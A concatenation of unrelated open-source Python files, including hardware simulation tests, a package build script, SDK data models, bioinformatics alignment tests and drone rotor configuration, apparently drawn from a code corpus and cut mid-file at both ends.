isinstance(dut.isample_module1.EXAMPLE_BOOL, ConstantObject) assert dut.isample_module1.EXAMPLE_BOOL.value == True # noqa @cocotb.test(skip=cocotb.LANGUAGE in ["verilog"]) async def access_boolean(dut): """Test access to a boolean""" with pytest.raises(IndexError): dut.stream_in_bool[3] assert len(dut.stream_in_bool) == 1 curr_val = dut.stream_in_bool.value dut.stream_in_bool.setimmediatevalue(not curr_val) await Timer(1, "ns") assert curr_val != dut.stream_out_bool.value @cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"]) async def access_internal_register_array(dut): """Test access to an internal register array""" assert ( dut.register_array[0].value.binstr == "xxxxxxxx" ), "Failed to access internal register array value" dut.register_array[1].setimmediatevalue(4) await Timer(1, "ns") assert ( dut.register_array[1].value == 4 ), "Failed to set internal register array value" @cocotb.test( skip=cocotb.LANGUAGE in ["vhdl"], expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("icarus") else (), ) async def access_gate(dut): """ Test access to a gate Object """ assert isinstance(dut.test_and_gate, HierarchyObject) # GHDL is unable to access record types (gh-2591) @cocotb.test( skip=cocotb.LANGUAGE in ["verilog"], expect_error=AttributeError if cocotb.SIM_NAME.lower().startswith("ghdl") else (), ) async def custom_type(dut): """ Test iteration over a custom type """ expected_sub = 84 expected_top = 4 count = 0 def _discover(obj): iter_count = 0 for elem in obj: iter_count += 1 iter_count += _discover(elem) return iter_count for sub in dut.cosLut: sub_count = _discover(sub) assert sub_count == expected_sub count += 1 assert expected_top == count @cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"]) async def type_check_verilog(dut): """ Test if types are recognized """ test_handles = [ (dut.stream_in_ready, "GPI_REGISTER"), (dut.register_array, "GPI_ARRAY"), (dut.temp, "GPI_REGISTER"), (dut.and_output, "GPI_NET"), (dut.stream_in_data, "GPI_NET"), (dut.logic_b, "GPI_REGISTER"), (dut.logic_c, "GPI_REGISTER"), (dut.INT_PARAM, "GPI_INTEGER"), (dut.REAL_PARAM, "GPI_REAL"), (dut.STRING_PARAM, "GPI_STRING"), ] if cocotb.SIM_NAME.lower().startswith("icarus"): test_handles.append( (dut.logic_a, "GPI_NET") ) # https://github.com/steveicarus/iverilog/issues/312 else: test_handles.append((dut.logic_a, "GPI_REGISTER")) for handle in test_handles: assert handle[0]._type == handle[1]
setup.py
spokestack/spokestack-python
139
12634812
import os import subprocess import sys from setuptools import Extension, find_packages, setup from setuptools.command.build_py import build_py try: from numpy import get_include except ImportError: subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy==1.19.2"]) from numpy import get_include try: from Cython.Build import cythonize except ImportError: subprocess.check_call([sys.executable, "-m", "pip", "install", "Cython==0.29.22"]) from Cython.Build import cythonize class CustomBuild(build_py): # type: ignore """Custom build command to build PortAudio.""" def run(self) -> None: """Custom run function that builds and installs PortAudio/PyAudio.""" if sys.platform == "mingw": # build with MinGW for windows command = ["./configure && make && make install"] elif sys.platform in ["win32", "win64"]: # win32/64 users should install the PyAudio wheel or Conda package command = None else: # macos or linux command = ["./configure && make"] if command: # build PortAudio with system specific command subprocess.run( command, shell=True, check=True, cwd="spokestack/extensions/portaudio", ) # install PyAudio after PortAudio has been built subprocess.run( [sys.executable, "-m", "pip", "install", "pyaudio"], shell=True, check=True, ) # run the normal build process build_py.run(self) SOURCES = [ os.path.join("spokestack/extensions/webrtc", source) for source in [ "filter_audio/other/complex_bit_reverse.c", "filter_audio/other/complex_fft.c", "filter_audio/other/copy_set_operations.c", "filter_audio/other/cross_correlation.c", "filter_audio/other/division_operations.c", "filter_audio/other/dot_product_with_scale.c", "filter_audio/other/downsample_fast.c", "filter_audio/other/energy.c", "filter_audio/other/get_scaling_square.c", "filter_audio/other/min_max_operations.c", "filter_audio/other/real_fft.c", "filter_audio/other/resample_by_2.c", "filter_audio/other/resample_by_2_internal.c", "filter_audio/other/resample_fractional.c", "filter_audio/other/resample_48khz.c", "filter_audio/other/spl_init.c", "filter_audio/other/spl_sqrt.c", "filter_audio/other/spl_sqrt_floor.c", "filter_audio/other/vector_scaling_operations.c", "filter_audio/vad/vad_core.c", "filter_audio/vad/vad_filterbank.c", "filter_audio/vad/vad_gmm.c", "filter_audio/vad/vad_sp.c", "filter_audio/vad/webrtc_vad.c", "filter_audio/agc/analog_agc.c", "filter_audio/agc/digital_agc.c", "filter_audio/ns/nsx_core.c", "filter_audio/ns/nsx_core_c.c", "filter_audio/ns/noise_suppression_x.c", ] ] EXTENSIONS = [ Extension( "spokestack.extensions.webrtc.agc", ["spokestack/extensions/webrtc/agc.pyx"] + SOURCES, include_dirs=["filter_audio/agc/include/"], ), Extension( "spokestack.extensions.webrtc.nsx", ["spokestack/extensions/webrtc/nsx.pyx"] + SOURCES, include_dirs=["filter_audio/ns/include/"], ), Extension( "spokestack.extensions.webrtc.vad", ["spokestack/extensions/webrtc/vad.pyx"] + SOURCES, include_dirs=["filter_audio/agc/include/"], ), ] with open("README.md", "r") as fh: long_description = fh.read() setup( name="spokestack", version="0.0.23", author="Spokestack", author_email="<EMAIL>", description="Spokestack Library for Python", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/spokestack/spokestack-python", packages=find_packages(), classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: Apache Software License", "Operating System :: OS Independent", ], python_requires=">=3.6", setup_requires=["setuptools", "wheel", "numpy==1.19.2", "Cython>=0.29.22"], install_requires=[ "numpy==1.19.2", "Cython>=0.29.22", "websocket_client", "tokenizers", "requests", ], ext_modules=cythonize(EXTENSIONS), include_dirs=[get_include()], cmdclass={"build_py": CustomBuild}, zip_safe=False, )
lightning_transformers/__init__.py
mariomeissner/lightning-transformers
451
12634816
"""Root package info.""" import os __ROOT_DIR__ = os.path.dirname(os.path.dirname(__file__)) __version__ = "0.1.0" __author__ = "PyTorchLightning et al." __author_email__ = "<EMAIL>" __license__ = "Apache-2.0" __copyright__ = f"Copyright (c) 2020-2020, {__author__}." __homepage__ = "https://github.com/PyTorchLightning/lightning-transformers" __docs__ = "PyTorch Lightning Transformers." __long_doc__ = """ Flexible interface for high performance research using SOTA Transformers leveraging PyTorch Lightning, Transformers, and Hydra. Transformers are increasingly popular for SOTA deep learning, gaining traction in NLP with BeRT based architectures more recently transcending into the world of Computer Vision and Audio Processing. However, training and fine-tuning transformers at scale is not trivial and can vary from domain to domain requiring additional research effort, and significant engineering. Lightning Transformers gives researchers a way to train HuggingFace Transformer models with all the features of PyTorch Lightning, while leveraging Hydra to provide composability of blocks and configs to focus on research. """
alipay/aop/api/domain/AlipayOverseasOpenPreorderCreateModel.py
antopen/alipay-sdk-python-all
213
12634825
<reponame>antopen/alipay-sdk-python-all<gh_stars>100-1000 #!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * from alipay.aop.api.domain.TuitionISVAgentInfoDTO import TuitionISVAgentInfoDTO from alipay.aop.api.domain.TuitionISVPayerInfoDTO import TuitionISVPayerInfoDTO from alipay.aop.api.domain.TuitionISVRequestPaymentInfoDTO import TuitionISVRequestPaymentInfoDTO from alipay.aop.api.domain.TuitionISVStudentInfoDTO import TuitionISVStudentInfoDTO class AlipayOverseasOpenPreorderCreateModel(object): def __init__(self): self._agent_info = None self._finish_self_audit = None self._payer_info = None self._payment_info = None self._pre_order_id = None self._student_info = None @property def agent_info(self): return self._agent_info @agent_info.setter def agent_info(self, value): if isinstance(value, TuitionISVAgentInfoDTO): self._agent_info = value else: self._agent_info = TuitionISVAgentInfoDTO.from_alipay_dict(value) @property def finish_self_audit(self): return self._finish_self_audit @finish_self_audit.setter def finish_self_audit(self, value): self._finish_self_audit = value @property def payer_info(self): return self._payer_info @payer_info.setter def payer_info(self, value): if isinstance(value, TuitionISVPayerInfoDTO): self._payer_info = value else: self._payer_info = TuitionISVPayerInfoDTO.from_alipay_dict(value) @property def payment_info(self): return self._payment_info @payment_info.setter def payment_info(self, value): if isinstance(value, TuitionISVRequestPaymentInfoDTO): self._payment_info = value else: self._payment_info = TuitionISVRequestPaymentInfoDTO.from_alipay_dict(value) @property def pre_order_id(self): return self._pre_order_id @pre_order_id.setter def pre_order_id(self, value): self._pre_order_id = value @property def student_info(self): return self._student_info @student_info.setter def student_info(self, value): if isinstance(value, TuitionISVStudentInfoDTO): self._student_info = value else: self._student_info = TuitionISVStudentInfoDTO.from_alipay_dict(value) def to_alipay_dict(self): params = dict() if self.agent_info: if hasattr(self.agent_info, 'to_alipay_dict'): params['agent_info'] = self.agent_info.to_alipay_dict() else: params['agent_info'] = self.agent_info if self.finish_self_audit: if hasattr(self.finish_self_audit, 'to_alipay_dict'): params['finish_self_audit'] = self.finish_self_audit.to_alipay_dict() else: params['finish_self_audit'] = self.finish_self_audit if self.payer_info: if hasattr(self.payer_info, 'to_alipay_dict'): params['payer_info'] = self.payer_info.to_alipay_dict() else: params['payer_info'] = self.payer_info if self.payment_info: if hasattr(self.payment_info, 'to_alipay_dict'): params['payment_info'] = self.payment_info.to_alipay_dict() else: params['payment_info'] = self.payment_info if self.pre_order_id: if hasattr(self.pre_order_id, 'to_alipay_dict'): params['pre_order_id'] = self.pre_order_id.to_alipay_dict() else: params['pre_order_id'] = self.pre_order_id if self.student_info: if hasattr(self.student_info, 'to_alipay_dict'): params['student_info'] = self.student_info.to_alipay_dict() else: params['student_info'] = self.student_info return params @staticmethod def from_alipay_dict(d): if not d: return None o = AlipayOverseasOpenPreorderCreateModel() if 'agent_info' in d: o.agent_info = d['agent_info'] if 'finish_self_audit' in d: o.finish_self_audit = d['finish_self_audit'] if 'payer_info' in d: o.payer_info = d['payer_info'] if 'payment_info' in d: o.payment_info = d['payment_info'] if 'pre_order_id' in d: o.pre_order_id = d['pre_order_id'] if 'student_info' in d: o.student_info = d['student_info'] return o
examples/pxScene2d/external/breakpad-chrome_55/gyp/test/win/gyptest-link-update-manifest.py
madanagopaltcomcast/pxCore
2,151
12634829
<filename>examples/pxScene2d/external/breakpad-chrome_55/gyp/test/win/gyptest-link-update-manifest.py #!/usr/bin/env python # Copyright (c) 2013 Google Inc. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ Make sure binary is relinked when manifest settings are changed. """ import TestGyp import os import sys if sys.platform == 'win32': import pywintypes import win32api import winerror RT_MANIFEST = 24 class LoadLibrary(object): """Context manager for loading and releasing binaries in Windows. Yields the handle of the binary loaded.""" def __init__(self, path): self._path = path self._handle = None def __enter__(self): self._handle = win32api.LoadLibrary(self._path) return self._handle def __exit__(self, type, value, traceback): win32api.FreeLibrary(self._handle) def extract_manifest(path, resource_name): """Reads manifest from |path| and returns it as a string. Returns None is there is no such manifest.""" with LoadLibrary(path) as handle: try: return win32api.LoadResource(handle, RT_MANIFEST, resource_name) except pywintypes.error as error: if error.args[0] == winerror.ERROR_RESOURCE_DATA_NOT_FOUND: return None else: raise test = TestGyp.TestGyp(formats=['msvs', 'ninja']) CHDIR = 'linker-flags' gyp_template = ''' { 'targets': [ { 'target_name': 'test_update_manifest', 'type': 'executable', 'sources': ['hello.cc'], 'msvs_settings': { 'VCLinkerTool': { 'EnableUAC': 'true', 'UACExecutionLevel': '%(uac_execution_level)d', }, 'VCManifestTool': { 'EmbedManifest': 'true', 'AdditionalManifestFiles': '%(additional_manifest_files)s', }, }, }, ], } ''' gypfile = 'update-manifest.gyp' def WriteAndUpdate(uac_execution_level, additional_manifest_files, do_build): with open(os.path.join(CHDIR, gypfile), 'wb') as f: f.write(gyp_template % { 'uac_execution_level': uac_execution_level, 'additional_manifest_files': additional_manifest_files, }) test.run_gyp(gypfile, chdir=CHDIR) if do_build: test.build(gypfile, chdir=CHDIR) exe_file = test.built_file_path('test_update_manifest.exe', chdir=CHDIR) return extract_manifest(exe_file, 1) manifest = WriteAndUpdate(0, '', True) test.fail_test('asInvoker' not in manifest) test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' in manifest) # Make sure that updating .gyp and regenerating doesn't cause a rebuild. WriteAndUpdate(0, '', False) test.up_to_date(gypfile, test.ALL, chdir=CHDIR) # But make sure that changing a manifest property does cause a relink. manifest = WriteAndUpdate(2, '', True) test.fail_test('requireAdministrator' not in manifest) # Adding a manifest causes a rebuild. manifest = WriteAndUpdate(2, 'extra.manifest', True) test.fail_test('35138b9a-5d96-4fbd-8e2d-a2440225f93a' not in manifest)
systemdlogger/systemdlogger.py
techjacker/systemdlogger
102
12634835
#!/usr/bin/env python3 import argparse from systemdlogger.runner import Runner def main(): parser = argparse.ArgumentParser( description=( 'Exports systemd logs to different storage backends' ', eg cloudwatch/elasticsearch.' ) ) parser.add_argument( 'config', type=str, help='path to config file' ) args = parser.parse_args() runner = Runner( config_path=args.config ) runner.run() if __name__ == '__main__': main()
Tests/test_Align_nexus.py
lukasz-kozlowski/biopython
2,856
12634848
# Copyright 2021 by <NAME>. All rights reserved. # # This code is part of the Biopython distribution and governed by its # license. Please see the LICENSE file that should have been included # as part of this package. """Tests for Bio.Align.nexus module.""" import unittest from io import StringIO from Bio.Align.nexus import AlignmentIterator, AlignmentWriter try: import numpy except ImportError: from Bio import MissingPythonDependencyError raise MissingPythonDependencyError( "Install numpy if you want to use Bio.Align.nexus." ) from None class TestNexusReading(unittest.TestCase): def check_reading_writing(self, path): alignments = AlignmentIterator(path) stream = StringIO() writer = AlignmentWriter(stream) n = writer.write_file(alignments) self.assertEqual(n, 1) alignments = AlignmentIterator(path) alignments = list(alignments) alignment = alignments[0] stream.seek(0) saved_alignments = AlignmentIterator(stream) saved_alignments = list(saved_alignments) self.assertEqual(len(alignments), len(saved_alignments)) saved_alignment = saved_alignments[0] for i, (sequence, saved_sequence) in enumerate( zip(alignment.sequences, saved_alignment.sequences) ): self.assertEqual(sequence.id, saved_sequence.id) self.assertEqual(sequence.seq, saved_sequence.seq) self.assertEqual(sequence.annotations, saved_sequence.annotations) self.assertEqual(alignment[i], saved_alignment[i]) self.assertTrue( numpy.array_equal(alignment.coordinates, saved_alignment.coordinates) ) def test_nexus1(self): path = "Nexus/test_Nexus_input.nex" with open(path) as stream: alignments = AlignmentIterator(stream) alignments = list(alignments) self.assertEqual(len(alignments), 1) alignment = alignments[0] self.assertEqual(len(alignment), 9) self.assertEqual(alignment.shape, (9, 46)) self.assertEqual(alignment.sequences[0].id, "t1") self.assertEqual(alignment.sequences[1].id, "t2 the name") self.assertEqual(alignment.sequences[2].id, "isn'that [a] strange name?") self.assertEqual( alignment.sequences[3].id, "one should be punished, for (that)!" ) self.assertEqual(alignment.sequences[4].id, "t5") self.assertEqual(alignment.sequences[5].id, "t6") self.assertEqual(alignment.sequences[6].id, "t7") self.assertEqual(alignment.sequences[7].id, "t8") self.assertEqual(alignment.sequences[8].id, "t9") self.assertEqual(alignment.sequences[0].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[1].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[2].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[3].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[4].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[5].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[6].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[7].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[8].annotations, {"molecule_type": "DNA"}) self.assertEqual( alignment.sequences[0].seq, "ACGTcgtgtgtgctctttacgtgtgtgctcttt" ) self.assertEqual(alignment.sequences[1].seq, "ACGcTcgtgtctttacacgtgtcttt") self.assertEqual(alignment.sequences[2].seq, "ACcGcTcgtgtgtgctacacacgtgtgtgct") self.assertEqual(alignment.sequences[3].seq, "ACGT") self.assertEqual( alignment.sequences[4].seq, "AC?GT?acgt???????????acgt????????" ) self.assertEqual( alignment.sequences[5].seq, "AcCaGtTc?aaaaaaaaaaacgactac?aaaaaaaaaa" ) self.assertEqual( alignment.sequences[6].seq, "A?CGgTgggggggggggggg???gggggggggggggggg" ) self.assertEqual( alignment.sequences[7].seq, "AtCtGtTtttttttttttt??ttttttttttttttttttt??" ) self.assertEqual( alignment.sequences[8].seq, "cccccccccccccccccccNcccccccccccccccccccccNcc" ) self.assertTrue( numpy.array_equal( alignment.coordinates, numpy.array( [ [ 0, 1, 1, 2, 2, 3, 3, 4, 5, 6, 8, 12, 13, 14, 16, 16, 17, 17, 18, 18, 18, 18, 19, 20, 21, 23, 27, 28, 29, 31, 31, 32, 32, 33, ], [ 0, 1, 1, 2, 2, 3, 4, 5, 6, 7, 9, 9, 9, 10, 12, 12, 13, 13, 14, 14, 14, 16, 17, 18, 19, 21, 21, 21, 22, 24, 24, 25, 25, 26, ], [ 0, 1, 1, 2, 3, 4, 5, 6, 7, 8, 10, 14, 15, 16, 16, 16, 16, 16, 16, 16, 18, 20, 21, 22, 23, 25, 29, 30, 31, 31, 31, 31, 31, 31, ], [ 0, 1, 1, 2, 2, 3, 3, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, ], [ 0, 1, 1, 2, 3, 4, 4, 5, 6, 6, 8, 12, 12, 13, 15, 15, 16, 17, 18, 18, 20, 20, 20, 21, 21, 23, 27, 27, 28, 30, 30, 31, 32, 33, ], [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 13, 14, 15, 17, 17, 18, 18, 19, 21, 23, 25, 26, 27, 28, 28, 32, 33, 34, 36, 36, 37, 37, 38, ], [ 0, 1, 2, 3, 3, 4, 5, 6, 7, 8, 10, 14, 15, 16, 18, 18, 19, 19, 20, 22, 22, 24, 25, 26, 27, 29, 33, 34, 35, 37, 37, 38, 38, 39, ], [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 15, 16, 17, 19, 19, 20, 20, 21, 23, 25, 27, 28, 29, 30, 32, 36, 37, 38, 40, 40, 41, 41, 42, ], [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 15, 16, 17, 19, 20, 21, 21, 22, 24, 26, 28, 29, 30, 31, 33, 37, 38, 39, 41, 42, 43, 43, 44, ], ] ), ) ) self.assertEqual( alignment[0], "A-C-G-Tcgtgtgtgctct-t-t------acgtgtgtgctct-t-t", ) self.assertEqual( alignment[1], "A-C-GcTcgtg-----tct-t-t----acacgtg-----tct-t-t", ) self.assertEqual(alignment[2], "A-CcGcTcgtgtgtgct--------acacacgtgtgtgct------") self.assertEqual(alignment[3], "A-C-G-T---------------------------------------") self.assertEqual(alignment[4], "A-C?G-T?-acgt??-???-???--??---?-acgt??-???-???") self.assertEqual(alignment[5], "AcCaGtTc?--aaaaaaaa-a-aacgactac?--aaaaaaaa-a-a") self.assertEqual(alignment[6], "A?C-GgTgggggggggggg-g-g??--?gggggggggggggg-g-g") self.assertEqual(alignment[7], "AtCtGtTtttttttttttt-?-?ttttttttttttttttttt-?-?") self.assertEqual(alignment[8], "cccccccccccccccccccNc-ccccccccccccccccccccNc-c") self.check_reading_writing(path) def test_nexus2(self): path = "Nexus/codonposset.nex" with open(path) as stream: alignments = AlignmentIterator(stream) alignments = list(alignments) self.assertEqual(len(alignments), 1) alignment = alignments[0] self.assertEqual(len(alignment), 2) self.assertEqual(alignment.shape, (2, 22)) self.assertEqual(alignment.sequences[0].id, "Aegotheles") self.assertEqual(alignment.sequences[1].id, "Aerodramus") self.assertEqual(alignment.sequences[0].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[1].annotations, {"molecule_type": "DNA"}) self.assertEqual(alignment.sequences[0].seq, "AAAAAGGCATTGTGGTGGGAAT") self.assertEqual(alignment.sequences[1].seq, "?????????TTGTGGTGGGAAT") self.assertTrue( numpy.array_equal(alignment.coordinates, numpy.array([[0, 22], [0, 22]])) ) self.assertEqual(alignment[0], "AAAAAGGCATTGTGGTGGGAAT") self.assertEqual(alignment[1], "?????????TTGTGGTGGGAAT") self.check_reading_writing(path) class TestNexusBasic(unittest.TestCase): def test_empty(self): import io stream = io.StringIO() with self.assertRaisesRegex(ValueError, "Empty file."): AlignmentIterator(stream) if __name__ == "__main__": runner = unittest.TextTestRunner(verbosity=2) unittest.main(testRunner=runner)
tests/checks/test_blank_row.py
jdaviscooke/goodtables-py
243
12634871
<gh_stars>100-1000 # -*- coding: utf-8 -*- from __future__ import division from __future__ import print_function from __future__ import absolute_import from __future__ import unicode_literals from goodtables.checks.blank_row import blank_row import goodtables.cells # Check def test_check_blank_row(log): cells = [ goodtables.cells.create_cell('name1', 'value', row_number=1), ] errors = blank_row(cells) assert log(errors) == [] assert len(cells) == 1 def test_check_blank_row_problem(log): cells = [ goodtables.cells.create_cell('name1', '', row_number=1), ] errors = blank_row(cells) assert log(errors) == [ (1, None, 'blank-row'), ] assert len(cells) == 0
robogym/robot/factories.py
0xflotus/robogym
288
12634882
from typing import Callable, Optional import numpy as np from robogym.robot.robot_interface import ControlMode, RobotControlParameters from robogym.robot.ur16e.mujoco.free_dof_tcp_arm import ( FreeDOFTcpArm, FreeRollYawTcpArm, FreeWristTcpArm, ) from robogym.robot.ur16e.mujoco.simulation.base import ArmSimulationInterface def build_tcp_controller( robot_control_params: RobotControlParameters, simulation: ArmSimulationInterface, initial_qpos: Optional[np.ndarray], autostep: bool = False, ) -> FreeDOFTcpArm: """ :param robot_control_params: :param simulation: Solver simulation. :param initial_qpos: Initial state for the solver robot. :param autostep: :return: """ assert robot_control_params.is_tcp_controlled() robot_cls: Optional[Callable[..., FreeDOFTcpArm]] = None if robot_control_params.control_mode is ControlMode.TCP_WRIST: robot_cls = FreeWristTcpArm elif robot_control_params.control_mode is ControlMode.TCP_ROLL_YAW: robot_cls = FreeRollYawTcpArm else: raise ValueError("Unknown control mode for TCP.") robot = robot_cls( simulation=simulation, initial_qpos=initial_qpos, robot_control_params=robot_control_params, autostep=autostep, ) assert isinstance(robot, FreeDOFTcpArm) return robot
modelchimp/models/__init__.py
samzer/modelchimp-server
134
12634911
from modelchimp.models.project import Project from modelchimp.models.membership import Membership from modelchimp.models.experiment import Experiment from modelchimp.models.comment import Comment from modelchimp.models.profile import Profile from modelchimp.models.user import User from modelchimp.models.invitation import Invitation from modelchimp.models.experiment_image import ExperimentImage from modelchimp.models.experiment_custom_object import ExperimentCustomObject
exercises/practice/dot-dsl/dot_dsl_test.py
Stigjb/python
1,177
12634923
import unittest from dot_dsl import Graph, Node, Edge, NODE, EDGE, ATTR class DotDslTest(unittest.TestCase): def test_empty_graph(self): g = Graph() self.assertEqual(g.nodes, []) self.assertEqual(g.edges, []) self.assertEqual(g.attrs, {}) def test_graph_with_one_node(self): g = Graph([ (NODE, "a", {}) ]) self.assertEqual(g.nodes, [Node("a", {})]) self.assertEqual(g.edges, []) self.assertEqual(g.attrs, {}) def test_graph_with_one_node_with_keywords(self): g = Graph([ (NODE, "a", {"color": "green"}) ]) self.assertEqual(g.nodes, [Node("a", {"color": "green"})]) self.assertEqual(g.edges, []) self.assertEqual(g.attrs, {}) def test_graph_with_one_edge(self): g = Graph([ (EDGE, "a", "b", {}) ]) self.assertEqual(g.nodes, []) self.assertEqual(g.edges, [Edge("a", "b", {})]) self.assertEqual(g.attrs, {}) def test_graph_with_one_attribute(self): g = Graph([ (ATTR, "foo", "1") ]) self.assertEqual(g.nodes, []) self.assertEqual(g.edges, []) self.assertEqual(g.attrs, {"foo": "1"}) def test_graph_with_attributes(self): g = Graph([ (ATTR, "foo", "1"), (ATTR, "title", "Testing Attrs"), (NODE, "a", {"color": "green"}), (NODE, "c", {}), (NODE, "b", {"label": "Beta!"}), (EDGE, "b", "c", {}), (EDGE, "a", "b", {"color": "blue"}), (ATTR, "bar", "true") ]) self.assertEqual(g.nodes, [Node("a", {"color": "green"}), Node("c", {}), Node("b", {"label": "Beta!"})]) self.assertEqual(g.edges, [Edge("b", "c", {}), Edge("a", "b", {"color": "blue"})]) self.assertEqual(g.attrs, { "foo": "1", "title": "Testing Attrs", "bar": "true" }) def test_malformed_graph(self): with self.assertRaises(TypeError) as err: Graph(1) self.assertEqual(type(err.exception), TypeError) self.assertEqual(err.exception.args[0], "Graph data malformed") with self.assertRaises(TypeError) as err: Graph("problematic") self.assertEqual(type(err.exception), TypeError) self.assertEqual(err.exception.args[0], "Graph data malformed") def test_malformed_graph_item(self): with self.assertRaises(TypeError) as err: Graph([()]) self.assertEqual(type(err.exception), TypeError) self.assertEqual(err.exception.args[0], "Graph item incomplete") with self.assertRaises(TypeError) as err: Graph([(ATTR, )]) self.assertEqual(type(err.exception), TypeError) self.assertEqual(err.exception.args[0], "Graph item incomplete") def test_malformed_attr(self): with self.assertRaises(ValueError) as err: Graph([(ATTR, 1, 2, 3)]) self.assertEqual(type(err.exception), ValueError) self.assertEqual(err.exception.args[0], "Attribute is malformed") def test_malformed_node(self): with self.assertRaises(ValueError) as err: Graph([(NODE, 1, 2, 3)]) self.assertEqual(type(err.exception), ValueError) self.assertEqual(err.exception.args[0], "Node is malformed") def test_malformed_EDGE(self): with self.assertRaises(ValueError) as err: Graph([(EDGE, 1, 2)]) self.assertEqual(type(err.exception), ValueError) self.assertEqual(err.exception.args[0], "Edge is malformed") def test_unknown_item(self): with self.assertRaises(ValueError) as err: Graph([(99, 1, 2)]) self.assertEqual(type(err.exception), ValueError) self.assertEqual(err.exception.args[0], "Unknown item")
config/m600/rotors.py
leozz37/makani
1,178
12634956
# Copyright 2020 Makani Technologies LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Rotor parameters.""" from makani.config import mconfig from makani.control import system_types as m import numpy as np @mconfig.Config(deps={ 'flight_plan': 'common.flight_plan', 'propellers': 'prop.propellers', 'wing_serial': 'common.wing_serial', }) def MakeParams(params): # Motor rotor moment-of-inertia [kg-m^2]. yasa_rotor_moment_of_inertia = 0.33 bottom_row = [m.kMotorSbo, m.kMotorSbi, m.kMotorPbi, m.kMotorPbo] # Assign propeller versions. propeller_versions = [None for _ in range(m.kNumMotors)] if params['wing_serial'] == m.kWingSerial01: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] in [m.kWingSerial04Crosswind]: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] == m.kWingSerial04Hover: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] in [m.kWingSerial05Crosswind]: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] == m.kWingSerial05Hover: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX elif params['wing_serial'] in [m.kWingSerial06Crosswind]: propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX 